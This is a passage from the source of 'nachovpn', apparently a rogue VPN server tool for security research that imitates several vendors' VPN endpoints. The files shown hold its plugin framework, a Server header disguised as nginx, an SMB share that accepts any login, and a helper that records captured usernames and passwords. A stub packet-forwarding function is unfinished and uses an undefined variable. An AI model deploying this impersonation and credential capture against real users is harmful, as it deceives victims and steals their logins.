# Set the event loop for this thread
self._loop = asyncio.get_running_loop()
self.logger.info(f"[TUN] PacketHandler using event loop {self._loop} in thread {threading.current_thread().name}")
# Log the tunnel configuration
self.logger.info(f"Tunnel configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}")
if TUNNEL_ENABLED:
# Initialize nftables
self._setup_nftables()
# Set up TUN interface
await self._setup_tun_interface()
# Set up TUN file descriptor
self._setup_tun_fd()
# Start background tasks
if self._lease_cleanup_task is None:
self._lease_cleanup_task = asyncio.create_task(self._lease_cleanup())
self.logger.info("Started lease cleanup task")
else:
self.logger.info("Tunnel disabled - skipping nftables, TUN interface, and lease cleanup setup")
# Set up PCAP writer (always enabled if configured)
if self.write_pcap and self.pcap_filename:
os.makedirs(os.path.dirname(self.pcap_filename), exist_ok=True)
self._fake_eth = Ether(src='01:02:03:04:05:06', dst='ff:ff:ff:ff:ff:ff')
self.logger.info(f"Using TUN interface MAC {self._fake_eth.src} for PCAP")
# Open PCAP writer
self._pcap_writer = PcapWriter(self.pcap_filename, append=True)
self.logger.info(f"Opened PCAP writer for {self.pcap_filename}")
except Exception as e:
self.logger.error(f"Error starting packet handler: {e}")
raise
================================================
FILE: src/nachovpn/core/plugin_manager.py
================================================
import logging
import traceback
import os
import asyncio
class PluginManager:
def __init__(self, loop=None):
self.plugins = []
self.loop = loop or asyncio.get_event_loop()
def register_plugin(self, plugin_class, **kwargs):
"""Register a plugin"""
if plugin_class.__name__ in os.getenv("DISABLED_PLUGINS", "").split(","):
logging.info(f"Skipping disabled plugin: {plugin_class.__name__}")
return
plugin = plugin_class(**kwargs)
self.plugins.append(plugin)
logging.info(f"Registered plugin: {plugin_class.__name__}")
def handle_data(self, data, client_socket, client_ip):
"""Try each plugin to handle raw VPN data"""
for plugin in self.plugins:
try:
if plugin.is_enabled() and plugin.can_handle_data(data, client_socket, client_ip):
return plugin.handle_data(data, client_socket, client_ip)
except Exception as e:
logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}")
logging.error(traceback.format_exc())
return False
def handle_http(self, handler):
"""Try each plugin to handle HTTP requests"""
for plugin in self.plugins:
try:
if plugin.is_enabled() and plugin.can_handle_http(handler):
handler.plugin_name = plugin.__class__.__name__
return plugin.handle_http(handler)
except Exception as e:
logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}")
logging.error(traceback.format_exc())
return False
================================================
FILE: src/nachovpn/core/request_handler.py
================================================
from http.server import BaseHTTPRequestHandler
import logging
import os
class VPNStreamRequestHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.plugin_manager = server.plugin_manager
super().__init__(request, client_address, server)
def send_header(self, keyword, value):
if keyword.lower() == 'server':
value = "nginx"
super().send_header(keyword, value)
def handle(self):
try:
first_line = self.rfile.readline()
if b'HTTP/' in first_line:
# Parse the HTTP request line and headers
self.raw_requestline = first_line
if self.parse_request():
# Delegate HTTP processing to PluginManager
if self.server.plugin_manager.handle_http(self):
return
# No plugin handled the request, send 404
logging.warning(f"Unhandled HTTP request from {self.client_address[0]}")
with open(os.path.join(os.path.dirname(__file__), '..',
'plugins', 'base', 'templates', '404.html'), 'rb') as f:
self.send_response(404)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(f.read())
else:
# Handle raw VPN data
if not self.server.plugin_manager.handle_data(first_line, self.connection, self.client_address[0]):
logging.warning(f"Unhandled raw VPN data from {self.client_address[0]}: {first_line}")
self.connection.close()
except Exception as e:
logging.error(f"Error processing request from {self.client_address[0]}: {e}")
self.connection.close()
def log_message(self, format, *args):
plugin_name = getattr(self, 'plugin_name', 'Default')
logging.info(f"[{plugin_name}] {self.client_address[0]} - - {format % args}")
================================================
FILE: src/nachovpn/core/smb_manager.py
================================================
from impacket.smbserver import SimpleSMBServer
import os
import stat
import logging
import threading
# SMB configuration
SMB_ENABLED = os.getenv("SMB_ENABLED", "false").lower() == "true"
SMB_SHARE_NAME = os.getenv("SMB_SHARE_NAME", "SHARE")
SMB_SHARE_PATH = os.getenv("SMB_SHARE_PATH", "smb")
class SMBManager:
def __init__(self):
self.logger = logging.getLogger(__name__)
self.server = None
if SMB_ENABLED:
self._setup_smb_server()
def auth_callback(self, *args, **kwargs):
"""Authentication callback"""
self.logger.debug(f"Authenticate message: {args} {kwargs}")
return True
def _setup_smb_server(self):
"""Set up the SMB server"""
try:
# Create share directory if it doesn't exist
os.makedirs(SMB_SHARE_PATH, exist_ok=True)
# Impacket's readOnly flag is not implemented, so make the directory read-only
os.chmod(SMB_SHARE_PATH, stat.S_IREAD | stat.S_IEXEC)
# Initialize SMB server
self.server = SimpleSMBServer("0.0.0.0", 445)
# Add share
self.server.addShare(SMB_SHARE_NAME.upper(), SMB_SHARE_PATH, shareComment='Nacho SMB Share', readOnly='yes')
# Enable SMBv2
self.server.setSMB2Support(True)
# Start SMB server in a separate thread
smb_thread = threading.Thread(target=self.server.start, daemon=True)
smb_thread.start()
self.logger.info(f"Started SMB server with share '{SMB_SHARE_NAME}' at {SMB_SHARE_PATH}")
except Exception as e:
self.logger.error(f"Failed to start SMB server: {e}")
self.server = None
================================================
FILE: src/nachovpn/core/utils.py
================================================
from scapy.all import IP, IPv6, ARP, UDP, TCP, Ether, rdpcap, wrpcap, \
srp, sendp, conf, get_if_addr, get_if_hwaddr, getmacbyip, sniff
import os
import logging
class PacketHandler:
"""
TODO: Implement a NAT-based packet handler where the plugin provides a callback function
that is called when a packet is received back from its destination and written to the client tunnel.
"""
def __init__(self, write_pcap=False, pcap_filename=None, logger_name="PacketHandler"):
self.write_pcap = write_pcap
self.pcap_filename = pcap_filename
self.logger = logging.getLogger(logger_name)
if self.write_pcap and pcap_filename is not None:
os.makedirs(os.path.dirname(pcap_filename), exist_ok=True)
def get_free_nat_port(self):
return 0
def forward_tcp_packet(self, packet_data):
src_ip = packet[IP].src
dst_ip = packet[IP].dst
sport = packet[TCP].sport
dport = packet[TCP].dport
self.logger.debug(f"Processing TCP packet: {src_ip}:{sport} -> {dst_ip}:{dport}")
# Get a unique NAT port for this connection
nat_port = self.get_free_nat_port()
# Modify packet for NAT
packet[IP].src = get_if_addr(conf.iface) # Replace source IP with our IP
packet[TCP].sport = nat_port # Replace source port with NAT port
self.logger.debug(f"New connection: {src_ip}:{sport} -> {dst_ip}:{dport} (NAT port: {nat_port})")
# Modify packet for NAT
packet[IP].src = get_if_addr(conf.iface) # Replace source IP with our IP
packet[TCP].sport = nat_port # Replace source port with NAT port
# Recalculate checksums
del packet[IP].chksum
del packet[TCP].chksum
# Send the packet out
sendp(packet, verbose=False, iface=conf.iface)
def packet_sniffer(self):
def packet_callback(packet):
try:
if IP not in packet:
return
# TODO: restore original IP and TCP ports
if self.receive_callback:
self.receive_callback(packet)
except Exception as e:
self.logger.error(f"Error processing packet: {e}")
self.logger.info('Starting packet sniffer')
sniff(iface=conf.iface, prn=packet_callback, store=False)
def handle_client_packet(self, packet_data):
packet = IP(packet_data)
self.logger.info(f"Received packet: {packet}")
self.append_to_pcap(packet)
def append_to_pcap(self, packet):
try:
if self.write_pcap and self.pcap_filename is not None:
# Add fake layer 2 data to the packet, if missing
if not packet.haslayer(Ether):
src_mac = get_if_hwaddr(conf.iface)
fake_ether = Ether(src=src_mac, dst=None)
packet = fake_ether / packet
wrpcap(self.pcap_filename, packet, append=True)
except Exception as e:
logging.error(f'Error appending to PCAP: {e}')
================================================
FILE: src/nachovpn/plugins/__init__.py
================================================
from nachovpn.plugins.base.plugin import VPNPlugin
from nachovpn.plugins.paloalto.plugin import PaloAltoPlugin
from nachovpn.plugins.cisco.plugin import CiscoPlugin
from nachovpn.plugins.sonicwall.plugin import SonicWallPlugin
from nachovpn.plugins.pulse.plugin import PulseSecurePlugin
from nachovpn.plugins.netskope.plugin import NetskopePlugin
from nachovpn.plugins.delinea.plugin import DelineaPlugin
from nachovpn.plugins.example.plugin import ExamplePlugin
__all__ = [
'VPNPlugin',
'PaloAltoPlugin',
'CiscoPlugin',
'SonicWallPlugin',
'PulseSecurePlugin',
'NetskopePlugin',
'DelineaPlugin',
'ExamplePlugin'
]
================================================
FILE: src/nachovpn/plugins/base/__init__.py
================================================
================================================
FILE: src/nachovpn/plugins/base/plugin.py
================================================
from flask import Flask, jsonify
from jinja2 import Environment, FileSystemLoader
import logging
import os
class VPNPlugin:
def __init__(self, cert_manager=None, external_ip=None, dns_name=None, db_manager=None, template_dir=None, packet_handler=None, **kwargs):
self.enabled = True
self.cert_manager = cert_manager
self.external_ip = external_ip
self.dns_name = dns_name
self.db_manager = db_manager
self.template_dir = template_dir
self.packet_handler = packet_handler
self.logger = logging.getLogger(self.__class__.__name__)
# setup Flask app
self.flask_app = Flask(__name__)
self._setup_routes()
# Set up Jinja2 environment if template_dir is provided
default_dir = os.path.join(os.path.dirname(__file__), 'templates')
if template_dir:
self.template_env = Environment(loader=FileSystemLoader([template_dir, default_dir]))
else:
self.template_env = Environment(loader=FileSystemLoader(default_dir))
def is_enabled(self):
return self.enabled
def get_thumbprint(self):
thumbprint = self.cert_manager.server_thumbprint
if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true':
dynamic_thumbprint = self.cert_manager.get_thumbprint_from_server(self.dns_name)
if dynamic_thumbprint:
self.logger.debug(f"Using dynamic thumbprint for {self.dns_name}: {dynamic_thumbprint}")
thumbprint = dynamic_thumbprint
return thumbprint
def _setup_routes(self):
# Define Flask routes within the class
@self.flask_app.route('/api/v1/healthcheck', methods=['GET'])
def healthcheck():
return jsonify({"message": "OK"})
@self.flask_app.errorhandler(404)
def page_not_found(e):
return self.render_template('404.html'), 404
def _send_flask_response(self, response, handler):
# Send the Flask response back to the client
handler.send_response(response.status_code)
for header, value in response.headers:
handler.send_header(header, value)
handler.end_headers()
handler.wfile.write(response.data)
def handle_get(self, handler):
with self.flask_app.test_client() as client:
response = client.get(handler.path, headers=dict(handler.headers))
self._send_flask_response(response, handler)
return True
def handle_post(self, handler):
content_length = int(handler.headers.get('Content-Length', 0))
body = handler.rfile.read(content_length)
# Use Flask's test_client to handle the request
with self.flask_app.test_client() as client:
response = client.post(handler.path, data=body, headers=dict(handler.headers))
self._send_flask_response(response, handler)
return True
def render_template(self, template_name, **context):
"""Render a template with the given context"""
if not hasattr(self, 'template_env'):
raise Exception("No template environment configured")
template = self.template_env.get_template(template_name)
return template.render(**context)
def can_handle_data(self, data, client_socket, client_ip):
"""Check if this plugin can handle the given data"""
return False
def can_handle_http(self, handler):
"""Determine if this plugin can handle the HTTP request"""
return False
def handle_data(self, data, client_socket, client_ip):
return False
def handle_http(self, handler):
if handler.command == 'GET':
return self.handle_get(handler)
elif handler.command == 'POST':
return self.handle_post(handler)
return False
def log_credentials(self, username, password, other_data=None):
"""Helper method to log credentials to the database."""
if self.db_manager:
self.db_manager.log_credentials(
username=username,
password=password,
plugin_name=self.__class__.__name__,
other_data=other_data
)
def _wrap_packet(self, packet_data, client):
"""Wrap the packet data with the plugin's specific protocol."""
return packet_data
================================================
FILE: src/nachovpn/plugins/base/templates/404.html
================================================
404 Not Found